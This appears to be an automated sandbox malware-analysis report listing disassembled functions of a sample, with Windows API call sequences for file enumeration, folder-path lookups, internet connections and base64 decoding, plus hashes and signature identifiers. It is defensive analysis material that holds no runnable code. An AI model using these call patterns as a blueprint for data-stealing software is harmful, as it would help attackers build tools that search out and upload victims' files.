Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: d84918a8bab9d2b40bac2b81053a19d5874cca919af21581d430d2c9d0c7d92e
Instruction ID: 1ad5e2c4eb5efa73f1b35bfbbb8ccb03f83dc81d7400d569231bf54a936ba5f3
Opcode Fuzzy Hash: d84918a8bab9d2b40bac2b81053a19d5874cca919af21581d430d2c9d0c7d92e
Instruction Fuzzy Hash: 2301D672B44254ABC714CF99ED45B9AF7B8F744B21F10026BFD15D3780D7B859008AE1

Function 007675AF Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007675D7
Module32First.KERNEL32(00000000,00000224), ref: 007675F7

Memory Dump Source

Source File: 00000000.00000002.2192748426.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: bfe06db34e9800c59703eb8d60fde758155566262d9a0a2b3533826e6f13a202
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: C8F0C232104710ABD7242AB9E88CB6E76E8AF48768F100168EA43920C1DA74EC458A60

Function 00810E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,00810223,?,?), ref: 00810E19
SetErrorMode.KERNEL32(00000000,?,?,00810223,?,?), ref: 00810E1E

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 38a33d7cf77271eff4fc9badce6bc49676e91161f5414cc284fa2bfc160f7c8c
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 5AD0123114512877DB002A95DC09BCD7B1CDF05B62F008411FB0DD9080C7B0998046E5

Function 0076726E Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 007672BF

Memory Dump Source

Source File: 00000000.00000002.2192748426.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 4cdf91c02ac8dc6f7d29f73855ce9325d1584d4a8e1141249837e991faefd18d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 53113C79A40208EFDB01DF98C985E99BBF5EF08390F098094F9499B362D775EA50DF80

Non-executed Functions

Function 00811907 Relevance: 172.2, APIs: 114, Instructions: 1164stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00811949
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00811980
lstrcpy.KERNEL32(00000000,00000000), ref: 008119D3
lstrcat.KERNEL32(00000000), ref: 008119DD
lstrcpy.KERNEL32(00000000,00000000), ref: 00811A09
lstrcpy.KERNEL32(00000000,00000000), ref: 00811A56
lstrcat.KERNEL32(00000000,00000000), ref: 00811A60
lstrcpy.KERNEL32(00000000,00000000), ref: 00811A8C
lstrcpy.KERNEL32(00000000,00000000), ref: 00811ADC
lstrcat.KERNEL32(00000000), ref: 00811AE6
lstrcpy.KERNEL32(00000000,00000000), ref: 00811B12
lstrcpy.KERNEL32(00000000,?), ref: 00811B5A
lstrcat.KERNEL32(00000000,00000000), ref: 00811B65
lstrlen.KERNEL32(0043179C), ref: 00811B70
lstrcpy.KERNEL32(00000000,00000000), ref: 00811B90
lstrcat.KERNEL32(00000000,0043179C), ref: 00811B9C
lstrcpy.KERNEL32(00000000,00000000), ref: 00811BC2
lstrcat.KERNEL32(00000000,00000000), ref: 00811BCD
lstrlen.KERNEL32(004317A0), ref: 00811BD8
lstrcpy.KERNEL32(00000000,00000000), ref: 00811BF5
lstrcat.KERNEL32(00000000,004317A0), ref: 00811C01

Part of subcall function 008344B7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 008344E4
Part of subcall function 008344B7: lstrcpy.KERNEL32(00000000,?), ref: 00834519

lstrcpy.KERNEL32(00000000,00000000), ref: 00811C2A
lstrcpy.KERNEL32(00000000,?), ref: 00811C75
lstrcat.KERNEL32(00000000,00000000), ref: 00811C7D
lstrlen.KERNEL32(0043179C), ref: 00811C88
lstrcpy.KERNEL32(00000000,00000000), ref: 00811CA8
lstrcat.KERNEL32(00000000,0043179C), ref: 00811CB4
lstrcpy.KERNEL32(00000000,00000000), ref: 00811CDD
lstrcat.KERNEL32(00000000,00000000), ref: 00811CE8
lstrlen.KERNEL32(0043179C), ref: 00811CF3
lstrcpy.KERNEL32(00000000,00000000), ref: 00811D13
lstrcat.KERNEL32(00000000,0043179C), ref: 00811D1F
lstrcpy.KERNEL32(00000000,00000000), ref: 00811D45
lstrcat.KERNEL32(00000000,00000000), ref: 00811D50
lstrcpy.KERNEL32(00000000,00000000), ref: 00811D78
FindFirstFileA.KERNEL32(00000000,?), ref: 00811DAC
StrCmpCA.SHLWAPI(?,004317A8), ref: 00811DD7
StrCmpCA.SHLWAPI(?,004317AC), ref: 00811DF1
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00811E2B
lstrcpy.KERNEL32(00000000,?), ref: 00811E62
lstrcat.KERNEL32(00000000,00000000), ref: 00811E6A
lstrlen.KERNEL32(0043179C), ref: 00811E75
lstrcpy.KERNEL32(00000000,00000000), ref: 00811E98
lstrcat.KERNEL32(00000000,0043179C), ref: 00811EA4
lstrcpy.KERNEL32(00000000,00000000), ref: 00811ED0
lstrcat.KERNEL32(00000000,00000000), ref: 00811EDB
lstrlen.KERNEL32(0043179C), ref: 00811EE6
lstrcpy.KERNEL32(00000000,00000000), ref: 00811F09
lstrcat.KERNEL32(00000000,0043179C), ref: 00811F15
lstrlen.KERNEL32(?), ref: 00811F22
lstrcpy.KERNEL32(00000000,00000000), ref: 00811F42
lstrcat.KERNEL32(00000000,?), ref: 00811F50
lstrlen.KERNEL32(0043179C), ref: 00811F5B
lstrcpy.KERNEL32(00000000,?), ref: 00811F7B
lstrcat.KERNEL32(00000000,0043179C), ref: 00811F87
lstrcpy.KERNEL32(00000000,00000000), ref: 00811FAD
lstrcat.KERNEL32(00000000,00000000), ref: 00811FB8
lstrcpy.KERNEL32(00000000,00000000), ref: 00811FE4
lstrcpy.KERNEL32(00000000,00000000), ref: 00812047
lstrcat.KERNEL32(00000000,00000000), ref: 00812052
lstrlen.KERNEL32(0043179C), ref: 0081205D
lstrcpy.KERNEL32(00000000,00000000), ref: 00812080
lstrcat.KERNEL32(00000000,0043179C), ref: 0081208C
lstrcpy.KERNEL32(00000000,00000000), ref: 008120B2
lstrcat.KERNEL32(00000000,00000000), ref: 008120BD
lstrlen.KERNEL32(0043179C), ref: 008120C8
lstrcpy.KERNEL32(00000000,?), ref: 008120E8
lstrcat.KERNEL32(00000000,0043179C), ref: 008120F4
lstrlen.KERNEL32(?), ref: 00812101
lstrcpy.KERNEL32(00000000,00000000), ref: 00812121
lstrcat.KERNEL32(00000000,?), ref: 0081212F
lstrcpy.KERNEL32(00000000,00000000), ref: 0081215B
lstrcpy.KERNEL32(00000000,00000000), ref: 008121A5
GetFileAttributesA.KERNEL32(00000000), ref: 008121AC
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00812206
lstrlen.KERNEL32(006389F0), ref: 00812215
lstrcpy.KERNEL32(00000000,?), ref: 00812242
lstrcat.KERNEL32(00000000,?), ref: 0081224A
lstrlen.KERNEL32(0043179C), ref: 00812255
lstrcpy.KERNEL32(00000000,00000000), ref: 00812275
lstrcat.KERNEL32(00000000,0043179C), ref: 00812281
lstrcpy.KERNEL32(00000000,?), ref: 008122A9
lstrcat.KERNEL32(00000000,00000000), ref: 008122B4
lstrlen.KERNEL32(0043179C), ref: 008122BF
lstrcpy.KERNEL32(00000000,00000000), ref: 008122DC
lstrcat.KERNEL32(00000000,0043179C), ref: 008122E8

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
String ID:
API String ID: 4127656590-0
Opcode ID: a0a01105cfe7b58a97d7429c9a1adf6e494a39dce98c424de72ac42d25d866f7
Instruction ID: c9d82c0ee87706fc37bbd02dc8d9cd341a229d76792e87645d27113e29b8df2b
Opcode Fuzzy Hash: a0a01105cfe7b58a97d7429c9a1adf6e494a39dce98c424de72ac42d25d866f7
Instruction Fuzzy Hash: 8C924AB590125A9BCB24AFA8CC88AEE7BBEFF44304F044124F905E7251DB74DD95CBA1

Function 00821C57 Relevance: 132.9, APIs: 88, Instructions: 909stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00821C89
lstrlen.KERNEL32(004317A0), ref: 00821C94
lstrcpy.KERNEL32(00000000,?), ref: 00821CB6
lstrcat.KERNEL32(00000000,004317A0), ref: 00821CC2
lstrcpy.KERNEL32(00000000,00000000), ref: 00821CE9
FindFirstFileA.KERNEL32(00000000,?), ref: 00821CFE
StrCmpCA.SHLWAPI(?,004317A8), ref: 00821D1E
StrCmpCA.SHLWAPI(?,004317AC), ref: 00821D38
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00821D76
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00821DA9
lstrcpy.KERNEL32(00000000,?), ref: 00821DD1
lstrcat.KERNEL32(00000000,00000000), ref: 00821DDC
lstrcpy.KERNEL32(00000000,00000000), ref: 00821E03
lstrlen.KERNEL32(0043179C), ref: 00821E15
lstrcpy.KERNEL32(00000000,00000000), ref: 00821E37
lstrcat.KERNEL32(00000000,0043179C), ref: 00821E43
lstrcpy.KERNEL32(00000000,00000000), ref: 00821E6B
lstrlen.KERNEL32(?), ref: 00821E7F
lstrcpy.KERNEL32(00000000,00000000), ref: 00821E9C
lstrcat.KERNEL32(00000000,?), ref: 00821EAA
lstrcpy.KERNEL32(00000000,00000000), ref: 00821ED0
lstrlen.KERNEL32(00638D00), ref: 00821EE6
lstrcpy.KERNEL32(00000000,00000000), ref: 00821F10
lstrcat.KERNEL32(00000000,00000000), ref: 00821F1B
lstrcpy.KERNEL32(00000000,00000000), ref: 00821F46
lstrlen.KERNEL32(0043179C), ref: 00821F58
lstrcpy.KERNEL32(00000000,00000000), ref: 00821F7A
lstrcat.KERNEL32(00000000,0043179C), ref: 00821F86
lstrcpy.KERNEL32(00000000,00000000), ref: 00821FAF
lstrcpy.KERNEL32(00000000,00000000), ref: 00821FDC
lstrcat.KERNEL32(00000000,00000000), ref: 00821FE7
lstrcpy.KERNEL32(00000000,00000000), ref: 0082200E
lstrlen.KERNEL32(0043179C), ref: 00822020
lstrcpy.KERNEL32(00000000,00000000), ref: 00822042
lstrcat.KERNEL32(00000000,0043179C), ref: 0082204E
lstrcpy.KERNEL32(00000000,00000000), ref: 00822077
lstrcpy.KERNEL32(00000000,00000000), ref: 008220A6
lstrcat.KERNEL32(00000000,00000000), ref: 008220B1
lstrcpy.KERNEL32(00000000,00000000), ref: 008220D8
lstrlen.KERNEL32(0043179C), ref: 008220EA
lstrcpy.KERNEL32(00000000,00000000), ref: 0082210C
lstrcat.KERNEL32(00000000,0043179C), ref: 00822118
lstrcpy.KERNEL32(00000000,00000000), ref: 00822141
lstrcpy.KERNEL32(00000000,00000000), ref: 00822170
lstrcat.KERNEL32(00000000,00000000), ref: 0082217B
lstrcpy.KERNEL32(00000000,00000000), ref: 008221A4
lstrlen.KERNEL32(0043179C), ref: 008221D0
lstrcpy.KERNEL32(00000000,00000000), ref: 008221ED
lstrcat.KERNEL32(00000000,0043179C), ref: 008221F9
lstrcpy.KERNEL32(00000000,00000000), ref: 0082221F
lstrlen.KERNEL32(006389A8), ref: 00822235
lstrcpy.KERNEL32(00000000,00000000), ref: 00822269
lstrlen.KERNEL32(0043179C), ref: 0082227D
lstrcpy.KERNEL32(00000000,00000000), ref: 0082229A
lstrcat.KERNEL32(00000000,0043179C), ref: 008222A6
lstrcpy.KERNEL32(00000000,00000000), ref: 008222CC
lstrlen.KERNEL32(00638BDC), ref: 008222E2
lstrcpy.KERNEL32(00000000,00000000), ref: 00822316
lstrlen.KERNEL32(0043179C), ref: 0082232A
lstrcpy.KERNEL32(00000000,00000000), ref: 00822347
lstrcat.KERNEL32(00000000,0043179C), ref: 00822353
lstrcpy.KERNEL32(00000000,00000000), ref: 00822379
lstrlen.KERNEL32(00638CE8), ref: 0082238F
lstrcpy.KERNEL32(00000000,00000000), ref: 008223B7
lstrcat.KERNEL32(00000000,00000000), ref: 008223C2
lstrcpy.KERNEL32(00000000,00000000), ref: 008223ED
lstrlen.KERNEL32(0043179C), ref: 008223FF
lstrcpy.KERNEL32(00000000,00000000), ref: 0082241E
lstrcat.KERNEL32(00000000,0043179C), ref: 0082242A
lstrcpy.KERNEL32(00000000,00000000), ref: 0082244F
lstrlen.KERNEL32(?), ref: 00822463
lstrcpy.KERNEL32(00000000,00000000), ref: 00822487
lstrcat.KERNEL32(00000000,?), ref: 00822495
lstrcpy.KERNEL32(00000000,00000000), ref: 008224BA
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 008224F6
lstrlen.KERNEL32(00638CA4), ref: 00822505
lstrcpy.KERNEL32(00000000,00000000), ref: 0082252D
lstrcat.KERNEL32(00000000,00000000), ref: 00822538

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
String ID:
API String ID: 712834838-0
Opcode ID: 3d77b5c61fa7b1930e55321776d513a302bb4781bd6cd9d06fb294281b17fff3
Instruction ID: d4760e8fd8a3a937dd80b8146647c052f342bc1c1694fe02ba5efff0d0b8304e
Opcode Fuzzy Hash: 3d77b5c61fa7b1930e55321776d513a302bb4781bd6cd9d06fb294281b17fff3
Instruction Fuzzy Hash: 9D62A3B4501627ABCB25AF78DC88AAE77BAFF44700F144528F804E7250DB78DD94CBA1

Function 00826D07 Relevance: 125.3, APIs: 83, Instructions: 752stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00826D3C
SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00826D6F
lstrcpy.KERNEL32(00000000,00000000), ref: 00826DA9
lstrcpy.KERNEL32(00000000,00000000), ref: 00826DD0
lstrcat.KERNEL32(00000000,00000000), ref: 00826DDB
lstrcpy.KERNEL32(00000000,00000000), ref: 00826E04
lstrlen.KERNEL32(00434D60), ref: 00826E1E
lstrcpy.KERNEL32(00000000,00000000), ref: 00826E40
lstrcat.KERNEL32(00000000,00434D60), ref: 00826E4C
lstrcpy.KERNEL32(00000000,00000000), ref: 00826E77
lstrcpy.KERNEL32(00000000,00000000), ref: 00826EA7
LocalAlloc.KERNEL32(00000040,?), ref: 00826EDC
strtok_s.MSVCRT ref: 00826F09
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00826F44
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00826F74

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlenstrtok_s
String ID:
API String ID: 922491270-0
Opcode ID: 6f7fc9a5c4093c6f01420e9034b0b469d2b3261e9c48b19ac8c3e6afc502b2e9
Instruction ID: 41ae21c427395bf0fa4a8f11fdde9e4fa871ab493ea6e62a73444640ce23fc86
Opcode Fuzzy Hash: 6f7fc9a5c4093c6f01420e9034b0b469d2b3261e9c48b19ac8c3e6afc502b2e9
Instruction Fuzzy Hash: 1442C5B4A04216AFCB15AF74ED89BAE7BB9FF04300F144418F901E7291EB74D995CBA1

Function 00816337 Relevance: 123.3, APIs: 68, Strings: 2, Instructions: 816stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00816366
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 008163B9
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 008163EC
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0081641C
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00816457
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0081648A
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0081649A

Strings

------, xrefs: 008165C0, 008165ED, 00816865, 00816956
", xrefs: 008168FE, 008169EC

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------
API String ID: 2041821634-2370822465
Opcode ID: 4d8a2cabd9318834d20159f90b681af5907982a0b19ed4795d5b6e39518a98be
Instruction ID: 4d0ec92b9bfd665269671230870ca30dff1620e11b08c57bf498129f7530a5d8
Opcode Fuzzy Hash: 4d8a2cabd9318834d20159f90b681af5907982a0b19ed4795d5b6e39518a98be
Instruction Fuzzy Hash: 6D526CB19002169BDB10AFB8DC85AEE77B9FF44314F148428F905E7251EB74EC95CBA1

Function 004060D0 Relevance: 123.3, APIs: 68, Strings: 2, Instructions: 816stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 004060FF
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00406152
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00406185
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 004061B5
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 004061F0
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00406223
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406233

Strings

", xrefs: 00406697, 00406785
------, xrefs: 00406359, 00406386, 004065FE, 004066EF

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------
API String ID: 2041821634-2370822465
Opcode ID: a29762c2ea8e180881f9e463ae9952283572da77a387d1d125401a0f764beff7
Instruction ID: e1c77a48c9db9f9d7e3cee1d994f76c9f30b806028e6ece8452b3a013e69dddc
Opcode Fuzzy Hash: a29762c2ea8e180881f9e463ae9952283572da77a387d1d125401a0f764beff7
Instruction Fuzzy Hash: 9C526D71A002169FCB21AB79DD89A9F77B5AF44304F15503AF806B72D1DB78EC058FA8

Function 00823CD7 Relevance: 122.4, APIs: 81, Instructions: 869stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00823CF3
FindFirstFileA.KERNEL32(?,?), ref: 00823D0A
StrCmpCA.SHLWAPI(?,004317A8), ref: 00823D33
StrCmpCA.SHLWAPI(?,004317AC), ref: 00823D4D
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00823D86
lstrcpy.KERNEL32(00000000,?), ref: 00823DAE
lstrcat.KERNEL32(00000000,00000000), ref: 00823DB9
lstrlen.KERNEL32(0043179C), ref: 00823DC4
lstrcpy.KERNEL32(00000000,00000000), ref: 00823DE1
lstrcat.KERNEL32(00000000,0043179C), ref: 00823DED
lstrlen.KERNEL32(?), ref: 00823DFA
lstrcpy.KERNEL32(00000000,00000000), ref: 00823E1A
lstrcat.KERNEL32(00000000,?), ref: 00823E28
lstrcpy.KERNEL32(00000000,00000000), ref: 00823E51
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00823E95
lstrlen.KERNEL32(?), ref: 00823E9F
lstrcpy.KERNEL32(00000000,00000000), ref: 00823ECC
lstrcat.KERNEL32(00000000,00000000), ref: 00823ED7
lstrcpy.KERNEL32(00000000,00000000), ref: 00823EFD
lstrlen.KERNEL32(0043179C), ref: 00823F0F
lstrcpy.KERNEL32(00000000,00000000), ref: 00823F31
lstrcat.KERNEL32(00000000,0043179C), ref: 00823F3D
lstrcpy.KERNEL32(00000000,00000000), ref: 00823F65
lstrlen.KERNEL32(?), ref: 00823F79
lstrcpy.KERNEL32(00000000,00000000), ref: 00823F99
lstrcat.KERNEL32(00000000,?), ref: 00823FA7
lstrlen.KERNEL32(006389F0), ref: 00823FD2
lstrcpy.KERNEL32(00000000,00000000), ref: 00823FF8
lstrcat.KERNEL32(00000000,00000000), ref: 00824003
lstrlen.KERNEL32(00638D00), ref: 00824025
lstrcpy.KERNEL32(00000000,00000000), ref: 0082404B
lstrcat.KERNEL32(00000000,00000000), ref: 00824056
lstrcpy.KERNEL32(00000000,00000000), ref: 0082407E
lstrlen.KERNEL32(0043179C), ref: 00824090
lstrcpy.KERNEL32(00000000,00000000), ref: 008240AF
lstrcat.KERNEL32(00000000,0043179C), ref: 008240BB
lstrcpy.KERNEL32(00000000,00000000), ref: 008240E1
lstrcpy.KERNEL32(00000000,?), ref: 0082410E
lstrcat.KERNEL32(00000000,00000000), ref: 00824119
lstrcpy.KERNEL32(00000000,00000000), ref: 00824140
lstrlen.KERNEL32(0043179C), ref: 00824152
lstrcpy.KERNEL32(00000000,00000000), ref: 00824174
lstrcat.KERNEL32(00000000,0043179C), ref: 00824180
lstrcpy.KERNEL32(00000000,00000000), ref: 008241A9
lstrcpy.KERNEL32(00000000,00000000), ref: 008241D8
lstrcat.KERNEL32(00000000,00000000), ref: 008241E3
lstrcpy.KERNEL32(00000000,00000000), ref: 0082420A
lstrlen.KERNEL32(0043179C), ref: 0082421C
lstrcpy.KERNEL32(00000000,00000000), ref: 0082423E
lstrcat.KERNEL32(00000000,0043179C), ref: 0082424A
lstrcpy.KERNEL32(00000000,00000000), ref: 00824273
lstrcpy.KERNEL32(00000000,00000000), ref: 008242A2
lstrcat.KERNEL32(00000000,00000000), ref: 008242AD
lstrcpy.KERNEL32(00000000,00000000), ref: 008242D4
lstrlen.KERNEL32(0043179C), ref: 008242E6
lstrcpy.KERNEL32(00000000,00000000), ref: 00824308
lstrcat.KERNEL32(00000000,0043179C), ref: 00824314
lstrcpy.KERNEL32(00000000,00000000), ref: 0082433C
lstrlen.KERNEL32(?), ref: 00824350
lstrcpy.KERNEL32(00000000,00000000), ref: 00824370
lstrcat.KERNEL32(00000000,?), ref: 0082437E
lstrcpy.KERNEL32(00000000,00000000), ref: 008243A7
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 008243E6
lstrlen.KERNEL32(00638CA4), ref: 008243F5
lstrcpy.KERNEL32(00000000,00000000), ref: 0082441D
lstrcat.KERNEL32(00000000,00000000), ref: 00824428
lstrcpy.KERNEL32(00000000,00000000), ref: 00824451
lstrcpy.KERNEL32(00000000,00000000), ref: 00824495
lstrcat.KERNEL32(00000000), ref: 008244A2
FindNextFileA.KERNEL32(00000000,?), ref: 008246A0
FindClose.KERNEL32(00000000), ref: 008246AF

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 1006159827-0
Opcode ID: 4bb0787a92797a6508168e381913953f9102390d117ad7cfe58007c1e833e119
Instruction ID: da745cb48fa648464d411ebbaf7e84d6dca9ff77f9b47795503d0071f051ec2a
Opcode Fuzzy Hash: 4bb0787a92797a6508168e381913953f9102390d117ad7cfe58007c1e833e119
Instruction Fuzzy Hash: 916291B59016269BCB25AF78DC88AEE77BAFF44304F045528F805E3250DB78DD94CBA1

Function 00814EB7 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00814EE6
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00814F39
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00814F6C
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00814F9C
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00814FDA
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0081500D
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0081501D

Strings

------, xrefs: 00815143, 00815170, 008153F2, 008154E3
", xrefs: 0081548B, 00815579

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------
API String ID: 2041821634-2370822465
Opcode ID: 4ad1566aa4d1a6649d9a197ec9ce9ed6d1b2bf2dd256a75520a651cb196df419
Instruction ID: b1203b2c134404030c160ea3df36b9325f54baef35c6ef954694924e55ad092d
Opcode Fuzzy Hash: 4ad1566aa4d1a6649d9a197ec9ce9ed6d1b2bf2dd256a75520a651cb196df419
Instruction Fuzzy Hash: 5F526CB19006569BDB10AFA8CC85AEE7BBAFF44314F145028F905E7251DB74EC86CBE1

Function 00826F20 Relevance: 96.5, APIs: 64, Instructions: 526stringmemoryencryptionCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00826F44
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00826F74
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00826FA4
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00826FD6
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00826FE3
RtlAllocateHeap.NTDLL(00000000), ref: 00826FEA
StrStrA.SHLWAPI(00000000,00434D90), ref: 00827001
lstrlen.KERNEL32(00000000), ref: 0082700C
malloc.MSVCRT ref: 00827016
strncpy.MSVCRT ref: 00827024
lstrcpy.KERNEL32(00000000,00000000), ref: 0082704F
lstrcpy.KERNEL32(00000000,00000000), ref: 00827076
StrStrA.SHLWAPI(00000000,00434D98), ref: 00827089
lstrlen.KERNEL32(00000000), ref: 00827094
malloc.MSVCRT ref: 0082709E
strncpy.MSVCRT ref: 008270AC
lstrcpy.KERNEL32(00000000,00000000), ref: 008270D7
lstrcpy.KERNEL32(00000000,00000000), ref: 008270FE
StrStrA.SHLWAPI(00000000,00434DA0), ref: 00827111
lstrlen.KERNEL32(00000000), ref: 0082711C
malloc.MSVCRT ref: 00827126
strncpy.MSVCRT ref: 00827134
lstrcpy.KERNEL32(00000000,00000000), ref: 0082715F
lstrcpy.KERNEL32(00000000,00000000), ref: 00827186
StrStrA.SHLWAPI(00000000,00434DA8), ref: 00827199
lstrlen.KERNEL32(00000000), ref: 008271A8
malloc.MSVCRT ref: 008271B2
strncpy.MSVCRT ref: 008271C0
lstrcpy.KERNEL32(00000000,00000000), ref: 008271F0
lstrcpy.KERNEL32(00000000,00000000), ref: 00827218
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0082723B
LocalAlloc.KERNEL32(00000040,00000000), ref: 0082724F
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00827270
LocalFree.KERNEL32(00000000), ref: 0082727B
lstrlen.KERNEL32(?), ref: 00827315
lstrlen.KERNEL32(?), ref: 00827328
